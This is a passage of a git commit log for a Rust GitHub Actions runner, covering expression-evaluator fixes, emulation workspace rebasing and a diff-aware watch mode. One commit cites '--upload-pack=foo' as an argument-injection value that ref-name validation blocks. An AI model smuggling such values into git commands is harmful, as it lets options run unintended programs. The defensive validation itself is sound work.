fewer tokens. CI is now `-D warnings`, so this was the difference between a green build and a red one. Swap to `sort_by_key(|pair| std::cmp::Reverse(pair.0.len()))`. Same descending-by-length order, same behavior, clippy goes quiet. Not a change anyone will miss. |
||
|
|
dcf0696de7 |
feat(evaluator): make toJSON(steps) return nested steps object (#97)
* feat(evaluator): make toJSON(steps) return nested steps object toJSON(steps) has been returning null this whole time, which is not particularly useful when you're trying to debug a multi-step workflow and want to dump the full steps context. The resolve() method had no match arm for bare "steps" — it just fell through to the catch-all Null. Meanwhile, all the infrastructure for nested objects (ExprValue::Object, recursive expr_to_json, sorted pretty-print) was already sitting right there from the env implementation. Build the nested structure that GHA provides: each step ID maps to an object with "outputs" (sub-object), "outcome", and "conclusion". Union keys from both step_outputs and step_statuses so we don't silently drop data if a step appears in only one map. Seven new tests cover the happy path, empty context, sorted keys, status-without-outputs, outputs-without-status, truthiness, and special characters. * style(evaluator): import HashSet at top of expression.rs Move inline std::collections::HashSet usage to a top-level import for consistency with HashMap. Apply rustfmt. |
||
|
|
100ff53167 |
fix(evaluator): make toJSON(env) return env object instead of null (#96)
* fix(evaluator): make toJSON(env) return env object instead of null
It turns out that `toJSON(env)` has been returning the string "null"
this whole time. The reason is straightforward: `ExprValue` had no
concept of an object — only strings, numbers, booleans, and null.
When the evaluator saw bare `env` (no dot, no property), it fell
through every match arm and landed on the catch-all `Null`. Then
toJSON happily serialized that to "null".
Add an `Object(HashMap<String, ExprValue>)` variant to `ExprValue`.
When `resolve()` encounters bare `env`, it now builds an Object from
env_context, filtering out system-injected keys (GITHUB_*, RUNNER_*,
INPUT_*, WRKFLW_*, CI). The toJSON function serializes Object values
as sorted, pretty-printed JSON to match real GitHub Actions behavior.
* fix(evaluator): clean up toJSON(env) Object variant plumbing
The previous commit added ExprValue::Object and wired it into
resolve() for bare `env` context. It worked, but it had a few
things that were *not great*.
The inline env-var filter (six separate prefix/name checks) was
duplicated knowledge about which vars the executor injects, buried
inside resolve() where nobody would think to update it when a new
internal prefix is added. Extract it into is_user_env_var() so
there's exactly one place to maintain.
The Vec of entries was sorted by key and then collected into a
HashMap, which — in case anyone needs reminding — does not preserve
insertion order. The sort was pure theatre. Remove it; toJSON
already re-sorts via BTreeMap when serializing.
While at it, add a test for the empty-env edge case (all vars are
internal) to make sure we get "{}" and not something surprising.
* fix(evaluator): use proper JSON serialization for toJSON(env) objects
The toJSON() serializer for Object values was using
to_output_string() to convert values before feeding them to
serde_json. That works fine *today* because all env values happen
to be strings, but it means nested objects would serialize as the
hilariously unhelpful "[object Object]" instead of actual JSON.
Switch to a proper expr_to_json() converter that maps ExprValue to
serde_json::Value recursively, so nested objects actually survive
serialization. While at it, stop fully-qualifying HashMap when it's
already imported — that's just noise.
Add a test for the completely-empty env context edge case, because
apparently nobody thought to check what happens when there are
literally zero environment variables.
* docs(evaluator): document is_user_env_var heuristic limitations
The is_user_env_var filter uses prefix matching to separate
user-declared env vars from runner-injected ones, but env_context
is a single flat HashMap that mixes both. This means a user who
writes `env: { GITHUB_CUSTOM: "val" }` gets silently excluded from
toJSON(env) output.
This is not great, but the proper fix — separating user env from
runner env upstream in ExpressionContext — is a larger refactor.
For now, document the limitation so nobody has to rediscover it the
hard way, add a test that pins the current (incorrect) behavior,
and drop a TODO for the other bare contexts (github, secrets,
matrix, steps, needs) that still return null under toJSON().
* fix(evaluator): harden Object variant and is_user_env_var heuristic
The is_user_env_var heuristic was living in blissful isolation from
the code that *actually injects* the internal env vars. If someone
added a new prefix in create_github_context without updating the
filter, internal vars would silently leak into toJSON(env) output
and nobody would know until a user complained.
Add a cross-module test that constructs the full github context and
asserts every single key is filtered by is_user_env_var. If the two
get out of sync, the test will scream. Make is_user_env_var
pub(crate) so the environment module can reach it.
While at it, add an explicit Object arm to expr_cmp instead of
relying on the catch-all — because "it happens to work" is not the
same as "it's correct." Also call out GITHUB_TOKEN in the doc
comment since that's the most likely real-world victim of the
heuristic.
Add tests for fromJSON/toJSON round-trip, special characters in env
values, and Object ordering comparisons.
* fix(evaluator): fix Object string coercion and tidy up review issues
to_output_string() for ExprValue::Object was returning "[object
Object]", which is what JavaScript does but *not* what GitHub Actions
does. GHA coerces objects to their JSON representation in string
contexts (e.g. ${{ env }}), so returning a JS-ism here would silently
produce garbage output for anyone relying on string interpolation of
context objects.
While at it, document the MATRIX_CONTEXT exclusion in is_user_env_var
so nobody has to go hunting for where it's inserted (it's
add_matrix_context() in environment.rs), and rename the misleadingly
named "roundtrip" test to what it actually tests — that
fromJSON(toJSON(env)) produces parseable JSON, not that it does a
true semantic roundtrip.
|
||
|
|
530a709652 |
fix(executor): populate workflow-level env in expression context (#95)
* fix(executor): populate workflow-level env in expression context
It turns out that `WorkflowDefinition` simply *didn't have* an `env`
field. Serde was silently discarding the workflow-level `env:` block
during YAML deserialization, so `${{ env.GLOBAL_VAR }}` evaluated to
empty string while `$GLOBAL_VAR` in shell commands worked fine —
because the OS environment got the vars, but the expression evaluator
never did.
Job-level and step-level env worked correctly because the `Job` and
`Step` structs both had their `env: HashMap<String, String>` fields.
The workflow-level struct just... didn't. For absolutely no reason.
Add the missing `env` field to `WorkflowDefinition` and merge it into
`env_context` right after `create_github_context()`, before job-level
env is applied. This gives correct precedence: step > job > workflow,
matching GitHub Actions behavior.
* fix(executor): harden workflow-level env precedence and add expression resolution
The previous commit added workflow-level env to the expression
context, but it used insert() which means a workflow that defines
env: { CI: "false" } would *override* the built-in GITHUB_*/CI
variables from create_github_context(). That is not great.
Real GitHub Actions never lets workflow env stomp on runner-provided
builtins. Switch to entry().or_insert() so workflow env only fills
in keys that aren't already set.
While at it, workflow-level env values containing ${{ }} expressions
(e.g. ${{ github.repository }}) were being inserted raw without
resolution. Job and step env both resolve expressions — workflow
env should too. Add the same preprocess_expressions() pass.
Add three tests covering: builtin var protection, workflow-vs-job
precedence, and expression substitution in workflow env values.
|
||
|
|
b711e871f7 |
fix(executor): propagate composite action outputs back to caller (#94)
* fix(executor): propagate composite action outputs back to caller
It turns out that execute_composite_action() was happily running all
the internal steps of a composite action, correctly tracking their
outputs in composite_step_outputs, and then... just throwing all of
that away. The action.yml `outputs:` section — the whole reason
composite actions *have* a return path — was never read or evaluated.
So ${{ steps.my-composite.outputs.whatever }} always resolved to
empty string. Inputs worked fine. The internal steps ran fine. The
output values were right there in memory. Nobody bothered to connect
the last wire.
Add propagate_composite_outputs() which reads the action's outputs
section after the step loop, evaluates each value expression against
the composite's internal step context, and writes the results to the
caller's GITHUB_OUTPUT file. The existing apply_step_environment_updates
pipeline then picks them up naturally — no changes to StepResult or
process_outcome needed.
Also wire this into the early-return failure path so partial outputs
are still available when a composite step fails.
* fix(executor): pass actual job status to composite output propagation
The previous commit (
|
||
|
|
a668d815c4 |
fix: artifact actions under --runtime emulation (#93)
* test(executor): cover run-step → upload/download-artifact handoff under emulation
Drive a real EmulationRuntime through execute_step for three steps (run,
upload-artifact, download-artifact) and assert the payload round-trips
byte-for-byte. Reproduces #88: today the run step writes via the
GITHUB_WORKSPACE reroute while upload reads ctx.working_dir, so the two
workspaces diverge and the upload fails with "No files found matching
pattern".
Test is intentionally failing at this commit; the fix follows.
* runtime(container): add resolve_host_working_dir helper
Introduces a pure function that rebases a container-visible working
directory onto its host-side volume source by finding the longest
component-boundary prefix in the volumes list and grafting the suffix.
This is the building block for making non-container runtimes
(emulation, secure_emulation) honor the same mount semantics as docker,
so a run: step and an artifact handler observe the same host workspace
(fix for #88). The helper itself is pure and pub(crate); wiring follows
in the next commit.
Component-boundary matching (via Path::strip_prefix) ensures
/github/workspace-foo is not matched by a /github/workspace mount.
* fix(runtime): emulation honors volume mounts for working dir (#88)
EmulationRuntime::run_container now rebases a container-visible
working directory onto its host-side volume source via
resolve_host_working_dir, matching the mount semantics docker already
provides. The old GITHUB_WORKSPACE / CI_PROJECT_DIR reroute is gone:
the volumes parameter is authoritative, and calling with a container
path that no volume covers is now a hard error instead of a silent
substitution.
This makes `run:` steps and artifact/cache handlers observe the same
host workspace, fixing the reported symptom where upload-artifact
returned "No files found matching pattern" because the run step had
written through the reroute to the real project directory while the
upload was searching the per-job tempdir.
Also adjust the #88 regression test to use a glob pattern compatible
with the `glob` crate's handling of trailing `**` (which matches zero
components in that position). The pattern quirk is orthogonal to #88;
tracking fixing artifact glob semantics separately.
* fix(runtime): secure_emulation honors volume mounts; sandbox runs in-place (#88)
Brings SecureEmulationRuntime and the Sandbox under the same mount
contract as EmulationRuntime and docker: a container-visible working
dir is rebased via `resolve_host_working_dir` onto its host-side volume
source, and the command is executed directly in that host path.
The Sandbox used to copy files into its own private workspace and run
there, so nothing the caller's `run:` step wrote was visible to any
subsequent artifact/cache handler — the same #88 symptom that hit
plain emulation, just via a different mechanism. The copy dance was
also not a meaningful security layer; validation comes from
`validate_command` (command whitelist, dangerous patterns) and
`is_env_var_safe` (env filtering), which still run.
Removed: Sandbox::setup_sandbox_environment, copy_safe_files,
is_path_allowed, should_skip_file, should_skip_directory, and the
`workspace: TempDir` field. Removed the file-filtering test that
covered only the deleted copy path. Added two targeted tests for the
new rebase behavior and the error-when-no-volume-covers path.
Uncovered container working dirs now fail loudly with
"not covered by any volume mount" instead of silently running in an
incorrect location.
* refactor(runtime): centralize rebase helper and tighten semantics
PR #93 landed the #88 fix, but review pointed out three things
I'd missed, and they're the kind that turn into the next bug
report if you leave them alone.
First: both EmulationRuntime and SecureEmulationRuntime did
`if working_dir.exists() { use it } else { rebase via volumes }`.
That's the wrong way around. If a dev happens to have a real
`/github/workspace` directory on their host — containerized dev
env, weird NFS mount, somebody being creative — the short-circuit
silently skips the rebase and we're right back to two workspaces
disagreeing about where files live. The whole point of the #88
fix is that the volume mapping is *authoritative*. Flipping the
branch order makes it actually authoritative: the volume wins
first, and we only fall back to \`working_dir\` as-is when no
volume claims it.
Second: ~50 lines of near-identical rebase + create_dir_all +
log + error boilerplate sat duplicated in two runtimes. The next
fix would get applied to one file and not the other. Extracted
into a single \`rebase_working_dir_or_error\` helper in
container.rs. Both call sites collapse to one line.
Third: SandboxConfig was still carrying \`allowed_read_paths\` and
\`allowed_write_paths\` fields that nothing reads. The old
\`is_path_allowed\` that used to check them is gone. Leaving dead
fields on a type named \`Sandbox\` is worse than removing them — a
reader a year from now will assume they're enforced and ship
something based on that assumption. Please don't do that.
Deleted them, along with the factory code that was still
populating them for no reason.
While at it: documented the \`>=\` tiebreaker in
\`resolve_host_working_dir\` (equal-depth ties only happen on
duplicate volume entries, so first-wins is deliberate, not a
typo), added the matching emulation error test for symmetry
with secure_emulation, added four new unit tests for the helper,
and put a module-level doc comment on SandboxConfig explaining
what the sandbox actually enforces (command validation, not
filesystem isolation).
19/19 runtime tests (up from 14), 333/333 executor tests
including the #88 regression, workspace clippy clean.
* fix(test): skip emulation artifact roundtrip test on Windows
The artifact roundtrip test runs `bash -c "mkdir ... && echo ..."`
through EmulationRuntime, which does `Command::new("bash")`. On
Windows CI runners, this resolves to WSL's `bash.exe` sitting in
`C:\Windows\System32\`, not Git Bash. And since the runner has no
WSL distributions installed, the test blows up with a helpful
"Windows Subsystem for Linux has no installed distributions" and
a link to the Microsoft Store.
The test is inherently Unix-only — it exercises Unix shell commands
on a real EmulationRuntime. Gate it with `cfg(not(target_os =
"windows"))`.
* fix(test): skip secure_emulation rebase test on Windows
Same story as
|
||
|
|
f4e9f84fc4 |
refactor(watcher,wrkflw): finish draining god-files into modules (#92)
* refactor(watcher,wrkflw): finish draining god-files into modules
The last round of extractions (event_kind, ignore, paths, setup,
trigger_cache, debouncer, shutdown) already peeled the leaves off
`watcher.rs`, but the orchestration core — the 430-line `run()`
body, the git-state cache, the per-cycle `evaluate_and_execute` —
was still sitting there, interleaved with the struct definitions
and hiding under 2071 lines of mostly-test file. `main.rs` had the
same problem on the CLI side: the `Run` and `Watch` match arms
were long inline blocks, and the `pull_request + no base-branch`
rejection was *literally copy-pasted* between the run arm's
`apply_base_branch` helper and the watch arm's inline block.
Having the same load-bearing error string in two places is not my
idea of redundancy.
Lift the TTL-bounded git-state cache into a new `git_state.rs` as
a proper `GitStateCache` type. The `Mutex<Option<CachedGitState>>`
field on `WorkflowWatcher` was a hint that this wanted its own
home. Move the whole main loop body into a new `reactor.rs`, and
while at it drag `evaluate_and_execute`, `refresh_trigger_cache_async`
and `canonicalize_changed_paths` with it — they're private, nobody
outside the reactor calls them, and leaving them on
`WorkflowWatcher` was just more clutter. Keep a `#[cfg(test)]`
shim for `cached_git_state` because two tests pin staleness
behavior through the method; changing the tests would have been
scope creep.
On the `wrkflw` side, extract `prefilter.rs` (holds
`PrefilterDecision`, `PrefilterRequest`, `run_trigger_prefilter`,
`build_event_context`, `apply_base_branch`,
`effective_strict_filter`, plus the seven prefilter unit tests),
then `run_workflow_cmd.rs` and `watch_cmd.rs` for the two command
bodies. Collapse the duplicated pull_request rejection into a new
shared `validate_event_requires_base_branch` helper so both hosts
render identical diagnostics. That's the whole reason the
prefilter pattern exists — to put the flag-matrix logic in one
testable place — and letting the watch command keep its own copy
was how we got here in the first place.
While at it, fix a silent-skip hole at the top of the reactor
loop. The workflow-rescan failure at the old `watcher.rs:628-637`
was logged at `debug` level, directly under a comment that called
the fallback "the exact silent-skip pattern the rest of this PR
has been plugging." Someone saw the hazard and then muted it.
Bump it to `warning` so a persistently-failing rescan (chmod 000,
flaking NFS mount, missing parent) actually surfaces to the user
instead of leaving them staring at a session-long "0 triggered"
stream. Non-verbose users would otherwise never know their new
workflow file was being ignored.
Numbers: `watcher.rs` 2071 → 1218 (~300 non-test), `main.rs` 2039
→ 937. New files: `git_state.rs` (171), `reactor.rs` (819),
`prefilter.rs` (814), `run_workflow_cmd.rs` (221), `watch_cmd.rs`
(248). Public API unchanged. All 46 watcher tests + 7 prefilter
tests still pass. \`cargo clippy -D warnings\` and \`cargo fmt
--check\` are both clean.
* fix(watcher,wrkflw): address review findings on god-file drain
Three things from the review on the refactor PR, none of them
structural but all three worth fixing before merge.
First, the unified `validate_event_requires_base_branch` helper had
hardcoded "simulating" in both the strict error and the non-strict
warning. Reads fine from `wrkflw run` — the run command *is*
simulating — but `wrkflw watch` is not simulating anything, it's
watching. The old inline watch-arm check used "Watching
pull_request" for a reason, and collapsing both sites onto a
run-flavored literal was a UX regression for watch users. The PR
body also claimed the two sites were "literally copy-pasted"; they
were similar but not textually identical. Reword the helper
host-neutral ("event `pull_request` without --base-branch..."),
drop the "simulating"/"watching" verbs entirely, and pin it with
three new tests: the non-PR passthrough pair, the
`pull_request_target` strict-mode rejection, and a regression pin
that fails the build if either host-specific verb ever sneaks back
in.
Second, the escalation of the per-cycle rescan-failure log from
`debug` to `warning` was the right direction — `debug` was
invisible to non-verbose users staring at a session-long "0
triggered" stream — but the same function wires up
`supervisor_warned_at_threshold` as a one-shot latch right above
the rescan code, and the rescan branch was left unlatched. Under
`chmod 000 .github/workflows` plus active file churn the new
warning would fire on every debounced cycle for the rest of the
session, which is the diagnostic-flood failure mode on the other
side of the silent-skip hole. Same pattern as the supervisor: warn
once per failing spell, reset the latch on the first healthy
rescan, log a matching info line on recovery so the operator sees
the transition.
Third, `SUPERVISOR_WARN_THRESHOLD` and `SUPERVISOR_HARD_CAP` were
declared `pub(crate)` on `watcher.rs` but read only from
`reactor.rs`. Move them next to the loop that enforces them, drag
the compile-time `const _: () = { assert!(...) }` invariant block
along, and leave a breadcrumb in `watcher.rs` so `git blame`
doesn't have to chase it.
46/46 watcher tests pass, prefilter tests go 7 → 10, clippy and
fmt both clean.
|
||
|
|
154df50968 |
feat: add diff-aware selective execution and watch mode (#91)
* feat: add diff-aware selective execution and watch mode
Add two new crates and CLI capabilities that differentiate wrkflw from act:
- `wrkflw-trigger-filter`: Parses workflow `on:` trigger configs (paths,
branches, tags filters) and evaluates them against git diff state to
determine which workflows would actually trigger.
- `wrkflw-watcher`: File system watcher using `notify` crate with
debouncing that auto-detects changes and re-runs affected workflows.
CLI additions:
- `wrkflw run --diff` uses git diff for trigger-aware execution
- `wrkflw run --event <type>` simulates a specific event type
- `wrkflw run --changed-files <list>` manually specifies changed files
- `wrkflw watch` monitors for changes and runs matching workflows
TUI additions:
- Press `d` to toggle diff-aware trigger filter overlay
- Shows green/gray indicators for which workflows would trigger
- Status bar reflects diff filter state
* fix(trigger-filter,watcher): correct glob semantics and fix watcher polling
The glob matchers in both path_matcher and ref_matcher were using
require_literal_separator: false, which means * happily matches /
in file paths and ref names. That's *not* how GitHub Actions works
— * matches anything except /, and ** is what crosses directory
boundaries. So src/* would incorrectly match src/sub/file.rs.
The test that was supposed to catch this (star_does_not_match_slash)
actually tested src/**/*.rs instead. Sneaky.
Set require_literal_separator: true in both matchers and fix the
test to actually assert the correct behavior.
While at it, fix two issues in the watcher's Debouncer:
The mutex handling was inconsistent — add_event and has_pending
silently swallowed poison, but drain called unwrap() and would
panic. Extract a lock_or_recover() helper that consistently
recovers from poison via into_inner() everywhere.
The main watch loop was busy-polling with a 100ms sleep, which is
wasteful and adds needless latency. Replace it with a
tokio::sync::Notify that fires when add_event inserts a path,
so the loop blocks properly until there's actual work to do.
* fix(trigger-filter): correct filter bypass and evaluate activity types
It turns out that when the event context had no branch (e.g., a tag
push), the branch filter check was simply *skipped*, meaning a
workflow with `branches: [main]` would happily match a tag push.
Same problem with the tag filter. The `if let Some(ref branch)`
guard meant "no branch = pass the filter", which is the exact
opposite of what GitHub Actions does.
The fix inverts the logic: check whether the filter *requires*
branches/tags first, and if the context doesn't have one, fail
immediately. While at it, the `types` field was being dutifully
parsed from YAML into `EventFilter.types` and then completely
ignored during evaluation. A workflow with `pull_request: { types:
[opened] }` would trigger on every PR event regardless. That's not
great. Add `activity_type` to `EventContext` and actually evaluate
it.
Also fix the TUI's `toggle_diff_filter` which was running
synchronous git subprocesses on the render thread — blocking the
entire UI while `git diff` thinks about its life choices. Move the
heavy lifting to `std::thread::spawn`. And replace an O(n²)
`Vec::contains` dedup in `get_changed_files` with a HashSet.
* fix(trigger-filter,watcher,ui): fix TUI blocking, watcher event loss, and dual filtering
Three issues found during review, all stemming from the diff-aware
execution feature introduced in the previous commits.
The TUI's toggle_diff_filter() was calling thread::spawn().join(),
which *blocks the main event loop thread* while git commands and
workflow parsing run. If git is slow (large repo, broken index,
network mount), the entire TUI freezes with no way out. Convert to
a fire-and-forget thread with an mpsc channel — the background
thread sends results, and check_diff_filter_results() polls on each
tick via try_recv(). No blocking, no freezing.
The watcher's main loop had a subtle event loss bug. After
notify.notified().await returns and a (potentially long) workflow
execution completes, any events that accumulated during execution
sit in the debouncer. But the loop goes back to notified().await,
which blocks until the *next* filesystem event — the accumulated
ones are orphaned. Add a has_pending() check before awaiting so we
process the backlog immediately.
The executor had an event_filter field on ExecutionConfig, giving it
trigger evaluation responsibilities that don't belong there. The
watcher already filters externally (correctly), creating two
divergent code paths for the same concern. Remove event_filter from
ExecutionConfig entirely and move trigger evaluation to the call
site in main.rs, where it belongs. The executor should just execute.
* fix(trigger-filter,watcher,ui): eliminate duplicated git logic, fix missing untracked files, and parallelize watcher
It turns out the TUI's evaluate_diff_filter was hand-rolling its
own git commands via std::process::Command instead of reusing the
async helpers in trigger-filter::git. Worse, it was only running
`git diff --name-only HEAD` and *not* including untracked files
via `git ls-files --others`. So newly added files were silently
invisible to the TUI diff filter. Not great.
Add synchronous wrappers (get_changed_files_sync,
get_current_branch_sync, get_current_tag_sync) to
trigger-filter::git, sharing the parsing logic with the async
versions via extracted helpers. The TUI now calls these instead
of maintaining its own parallel universe of git invocations.
While at it, fix three more things:
- The watcher was executing triggered workflows sequentially,
meaning a slow workflow would block all others and starve
event processing. Switch to futures::future::join_all for
concurrent execution.
- The debouncer's drain() was unconditionally sleeping for the
full debounce duration even when nothing was pending. Now it
returns immediately when empty and re-checks for new arrivals
after each sleep window so event bursts settle properly.
- The eval reason messages were useless when filters failed due
to missing context (no branch, no tag, no activity type). They
now say *why* the filter couldn't match instead of just dumping
the pattern list.
* fix(watcher,trigger-filter,ui): fix watcher stalls, unbounded concurrency, and sync API duplication
The watcher had a few problems that would make it miserable to use on
any real-world repository.
First, the notify callback was using blocking_send() on the mpsc
channel, which means when the channel fills up (256 slots), the *OS
filesystem event thread* blocks. That's the kind of thing that makes
your entire watcher stop receiving events. Switched to try_send() —
dropping a duplicate event is fine since the debouncer coalesces
anyway.
Second, the watcher was recursively watching the entire repo root
with no exclusions beyond .git/. On any project with a target/ or
node_modules/ directory, this floods the event channel with thousands
of irrelevant build artifact changes. Added a DEFAULT_IGNORE_DIRS
list that filters at the path-component level.
Third, join_all() on the triggered workflow futures meant *unbounded*
concurrent execution. If 20 workflows trigger simultaneously, that's
20 Docker containers spawning at once. Replaced with
buffer_unordered(4) so we don't eat all available resources.
While at it, a few more cleanups from the review:
- Renamed the misleading on_event callback to on_cycle_complete,
since it fires *after* execution completes, not on detection.
- Extracted the 170-line evaluate-and-execute loop from run() into
its own evaluate_and_execute() method.
- Parallelized the two sequential git subprocess calls in
get_changed_files() with tokio::join!.
- Killed the entire sync API in git.rs (three copy-pasted functions).
The TUI's evaluate_diff_filter now spins up a lightweight
current_thread tokio runtime instead of maintaining duplicate sync
wrappers. Having the same logic in two places with two slightly
different implementations is not redundancy, it's a bug farm.
- Renamed LogFilterLevel::to_string() to as_str() because shadowing
the ToString trait with an inherent method is a Clippy lint and
genuinely confusing.
* fix(trigger-filter,watcher,ui): fix debouncer livelock, dead code, and broken diff base
Three issues found during review, all interconnected:
The debouncer's drain() loop had no upper bound on settle rounds.
If filesystem events arrived faster than the debounce window (e.g.
a large build writing hundreds of files), it would spin forever
comparing pending.len() != count_before. Add a MAX_SETTLE_ROUNDS
cap of 10 so it eventually gives up waiting for silence and just
drains what it has.
The trigger-filter crate exported filter_workflows() and
auto_detect_context() — nice reusable helpers — and then both
state.rs and watcher.rs proceeded to ignore them entirely and
inline their own copies of the same logic. Three copies of "build
EventContext, loop over workflows, evaluate triggers" is not
redundancy, it's a maintenance trap. Refactor both callsites to
actually use the helpers they're sitting next to.
The TUI diff filter was hardcoded to diff against HEAD, which only
shows uncommitted changes. Post-commit, the diff is empty and every
workflow gets filtered out. Add get_default_diff_base() which
checks for uncommitted changes first (uses HEAD), then falls back
to merge-base with main/master, then HEAD~1. The TUI now uses this
via auto_detect_context so it shows meaningful results even after
committing.
While at it, cargo fmt touched eval.rs formatting. No logic change.
* fix(trigger-filter): fix staged file blindness, hardcoded default branch, and dead code
get_changed_files() was running `git diff --name-only HEAD` and
proudly calling that "staged + unstaged changes." It turns out
that command only shows *unstaged* changes. Files sitting in the
index after `git add` were completely invisible to trigger
evaluation. Confusion ensues.
Add a parallel `git diff --cached --name-only <base>` call and
merge its results with the unstaged diff, deduplicating paths.
Now we actually see what the user staged. Novel concept.
get_default_diff_base() had "main" and "master" hardcoded as the
only candidates for the merge-base. Repos using "develop", "trunk",
or literally anything else would silently fall back to HEAD~1,
which is almost certainly wrong. Query `git symbolic-ref
refs/remotes/origin/HEAD` first to detect the *actual* default
branch, then fall back to the hardcoded list.
While at it, remove the dead PatternError variant from
TriggerFilterError — it was never constructed anywhere.
* fix(trigger-filter,watcher,ui): consolidate EventContext, fix fallback crash, and harden watch loop
Three call sites — CLI run, TUI toggle, and the watcher — were each
hand-assembling EventContext with subtly different logic. The CLI
forgot to use auto_detect_context, the watcher skipped untracked
files, and the TUI was the only one doing it right. It was only a
matter of time before these diverged further.
Add context_from_diff_range() and context_from_changed_files() to
trigger-filter and use them everywhere. One place to get it right,
zero places to get it wrong.
The get_default_diff_base() fallback was blindly returning "HEAD~1"
which *explodes* on single-commit repos because there is no parent.
Now we verify HEAD~1 resolves first and fall back to the git empty
tree SHA (4b825dc6...) as the ultimate backstop — which means "all
files are changed" rather than "crash and burn."
While at it:
- Wrap on_cycle_complete in spawn_blocking so a blocking callback
can't stall the entire watch loop
- Re-collect workflow files each cycle so newly added .yml files
get picked up without a restart
- Guard rapid 'd' toggle in the TUI against spawning duplicate
background threads by dropping the in-flight receiver first
- Add 15 new tests covering filter_workflows, should_ignore_path,
debouncer livelock prevention, invalid globs, and parser types
* fix(watcher,wrkflw,ui): make watch concurrency configurable and warn on lone --event
Three small things from a code review that were bugging me.
First: the watcher had MAX_CONCURRENT_EXECUTIONS hardcoded to 4.
Fine for a typical .github/workflows directory, terrible for anyone
with 30 workflows who actually wants them to run. Promote it to
DEFAULT_MAX_CONCURRENT_EXECUTIONS, plumb a max_concurrency parameter
through WorkflowWatcher::new, and expose it as --max-concurrency on
the watch command. Clamp to >= 1 because passing 0 to
buffer_unordered would just deadlock, and "deadlock on user input"
is not the user experience I want to ship.
Second: `wrkflw run --event push` (without --diff or
--changed-files) silently builds an EventContext with zero changed
files. Any workflow with a `paths:` filter then "doesn't trigger"
and the user has no idea why. Log a warning explaining exactly what
happened and what to do about it. Not a fix per se — the behavior is
technically correct — but silent surprise is worse than a loud
warning.
While at it: add a comment on the `_watcher` binding in the watch
loop because RecommendedWatcher stops emitting events the moment it
gets dropped, and that's the kind of footgun future-me will
absolutely step on. Also flatten a pointless nested if/else in
status_bar.rs that clippy would have eventually complained about
anyway.
* fix(trigger-filter,watcher,ui): stop lying about which workflows would run
The diff-aware execution feature had a pile of quiet ways to
mislead the user, which is the worst kind of bug in a tool whose
entire purpose is "tell me what would run."
First, invalid glob patterns were silently swallowed. A typo
like `paths: [src/**.rs]` matched nothing and there was no
diagnostic — the workflow just reported "would not trigger" and
everyone assumed it was correct. Compile globs up front in
parse_trigger_config and surface bad patterns as ParseError
pointing at the exact key (e.g. `push.paths`). Pre-compiling
also means we're not re-running Pattern::new on every hot path.
Second, the \`pull_request: branches:\` filter was matched against
the current working branch. GitHub Actions matches it against
the *base* (target) branch, so any workflow guarded by
\`pull_request: branches: [main]\` was reported as "would not
trigger" when evaluated on a feature branch. That's the exact
opposite of what happens on GitHub. Add base_branch to
EventContext, route it through branch_for_filter(), expose a
--base-branch flag on both \`run\` and \`watch\`, and warn loudly
when the user simulates pull_request without it.
Third — and this is the fun one — the TUI's diff filter zipped
background-thread results *positionally* against self.workflows.
The background thread captured workflow_paths at toggle time
and sent back a Vec. If the workflow list reloaded between
toggle and result delivery (a new .yml appears on disk, which
is *exactly* what a file-watcher app does), the positional zip
assigned statuses to the wrong workflows. Send (PathBuf, status)
pairs through the channel and key them by path on receipt.
While at it:
- should_ignore_path matched any component anywhere in the path
against the blacklist, so a file literally named
\`scripts/target\` or \`docs/build\` was silently dropped.
Repo-root-relative + skip-the-leaf fixes it.
- All git commands take an optional cwd and prepend
\`git -C <root>\`, so the watcher queries the repo it's actually
watching instead of whatever the process CWD happens to be.
- Ref names are validated against an allowlist before being
passed to \`git diff\`, so \`--upload-pack=foo\` and friends can't
sneak in through --diff-base.
- For non-HEAD base, the redundant \`git diff --cached <ref>\` was
doing nothing useful — \`git diff <ref>\` already covers staged
+ unstaged. Dropped.
- Workflow files are cached in the watcher and only reparsed
when they actually change. If all of them fail to parse, say
so — before, the user just saw "0 triggered, 0 skipped" and
wondered what they'd broken.
- Empty-tree SHA fallback is now a named constant and logs a
warning when it's used. If you've fallen back to diffing
against the empty tree, you almost certainly don't want to.
- The 200-line Run arm in main.rs is extracted into
run_trigger_prefilter_or_exit().
- Dead TriggerFilterError::IoError variant removed.
Tests: 57 in trigger-filter (incl. PR base_branch semantics,
invalid-glob parse errors, ref validation), 13 in watcher
(incl. file-named-target cases), plus a regression test in the
TUI for the path-keyed mapping.
* fix(watcher,trigger-filter): stop dropping fs events and thrashing globs
A fresh code review turned up a handful of real issues in the
diff-aware execution path. A few of them were silent failure
modes, which is the worst kind.
The watcher had a 256-slot bounded MPSC with `try_send` sitting
between the notify callback and the debouncer. The comment said
dropping was fine "because the debouncer coalesces anyway" — which
is only true for repeat events on the *same* path. Burst 300
distinct file changes at it and ~44 unique paths just vanish, and
any workflow whose `paths:` filter matched exactly one of those
files fails to trigger. Which is the entire point of the feature.
Rip the channel out. The notify callback now pushes straight into
the debouncer's shared set — a hashset insert under a mutex,
bounded in cost, and it dedups for free. No intermediate buffer
to overflow.
It turns out `strip_prefix(&self.repo_root)` was also lying to us.
On macOS, `/var` gets delivered as `/private/var`; symlinked
worktrees have the same problem. Every event would fail the
prefix check, the relative path list ended up empty, and the loop
cheerfully `continue`d without telling anyone. Canonicalize the
repo root once at startup and canonicalize incoming paths before
stripping. Warn in verbose mode when events still don't resolve,
so there's a breadcrumb when it does go wrong.
While in there, the watcher was re-parsing every workflow's
trigger config *and recompiling every glob pattern* on every
cycle, because `filter_workflows` takes `WorkflowDefinition` and
parses on the spot. Add `filter_trigger_configs` taking pre-parsed
`WorkflowTriggerConfig`s, and have the watcher cache them by path,
invalidated only when the backing file actually shows up in
`changed_paths`. Free performance for anyone with more than three
workflow files.
And some smaller stuff the review turned up:
`auto_detect_context` and friends were running three git
subprocesses sequentially for absolutely no reason. `tokio::join!`
them. `validate_ref_name` was rejecting `HEAD@{1}`, `@~1`, and
`origin/main@{upstream}` — all perfectly legitimate git revision
syntax — so extend the allowlist to include `@`, `{`, `}`. The
TUI's diff-filter evaluator was hardcoding `event_name = "push"`;
thread it through as a parameter so future event selection is a
plumbing change, not a rewrite. And `run --diff` crashed with a
confusing "Error parsing workflow" message when pointed at a
directory — catch that up front and point the user at
`wrkflw watch` instead.
* fix(trigger-filter,watcher,ui): plug silent-failure holes and unblock reactor
The review on this branch turned up a handful of "the filter
quietly lies to you" bugs plus a watch loop that cheerfully
calls blocking syscalls from inside an async function. Let's
fix all of it.
First, the *actually* scary one: inline `!`-prefixed patterns
in `branches:`/`tags:`/`paths:` were compiled as literal globs.
The `glob` crate doesn't treat a leading `!` as negation, so
something like `branches: ['main', '!release/old']` would
